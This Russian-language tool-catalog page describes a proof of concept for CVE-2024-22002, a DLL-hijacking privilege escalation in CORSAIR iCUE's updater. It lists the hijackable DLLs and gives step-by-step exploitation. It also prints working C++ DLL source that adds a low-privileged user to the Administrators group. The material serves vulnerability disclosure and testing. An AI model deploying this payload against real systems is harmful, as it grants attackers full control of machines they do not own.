Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
iCUE_DllHijack_LPE-CVE-2024-22002 — Доказательство концепции уязвимости локального повышения привилегий (CVE-2024-22002) в CORSAIR iCUE v5.9.105 через внедрение DLL во время процесса обновления, что позволяет непривилегированным пользователям получать привилегии SYSTEM. | Kitploit
Инструменты/GitHubGitHub/0xkickit/icue_dllhijack_lpe-cve-2024-22002
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеЭксплуатация Бинарных Файлов
GitHub0xkickit/icue_dllhijack_lpe-cve-2024-22002

iCUE_DllHijack_LPE-CVE-2024-22002

Доказательство концепции уязвимости локального повышения привилегий (CVE-2024-22002) в CORSAIR iCUE v5.9.105 через внедрение DLL во время процесса обновления, что позволяет непривилегированным пользователям получать привилегии SYSTEM.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
2 лет назадЕщё не проверено

Уязвимое программное обеспечение и версия

  • Ссылка для скачивания ПО: CORSAIR iCUE v5.9.105 with iCUE Murals

Описание

Уязвимость типа DLL Hijacking была обнаружена в iCUE v5.9.105. Эта уязвимость возникает в процессе обновления, управляемом службой "iCUEUpdateService". Служба запускает процесс ("cuepkg.exe"), ответственный за проведение обновления, работающий с привилегиями "NT AUTHORITY\SYSTEM". При запуске процесса он ищет различные DLL-библиотеки в каталоге \cuepkg-1.2.6, расположенном в каталоге установки iCUE. Некоторые из этих DLL-библиотек по умолчанию отсутствуют, но поскольку обычный пользователь имеет права на создание файлов в этом каталоге, злоумышленник может внедрить вредоносную DLL в этот каталог. Следовательно, эта вредоносная DLL будет загружена cuepkg.exe с правами администратора.

Затронутые DLL-библиотеки, которые были выявлены, следующие:

  • MSASN1.dll
  • NTASN1.dll
  • profapi.dll

Вектор CVSS: (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)

  • Базовый балл: 7.8 (Высокий)
  • Временной балл: 7.8 (Высокий)
  • Экологический балл: 7.8 (Высокий)

PoC

В качестве примера будет взята DLL profapi.dll.

  1. Создаем нашу вредоносную DLL и добавляем ее в каталог %INSTALLDIR%cuepkg-1.2.6.
  2. Ждем автоматического обновления программы или, в данном случае, принудительно запускаем обновление, нажав "Проверить наличие обновлений".
  3. Наш пользователь без прав администратора добавляется в группу администраторов.

Привилегии пользователя lowpriv до выполнения вредоносной DLL: lowpriv_cmd

Привилегии пользователя lowpriv после выполнения вредоносной DLL: lowpriv_cmd_adm

  • Пример вредоносного кода:
root@kitploit:~
#include "pch.h"
#include <windows.h>
#include <cstdlib>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
    {
        system("net localgroup Administrators desktop-ckfiane\\lowpriv /add");
    }
    break;
    case DLL_PROCESS_DETACH:
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    }

    return TRUE;
}
Скачать инструмент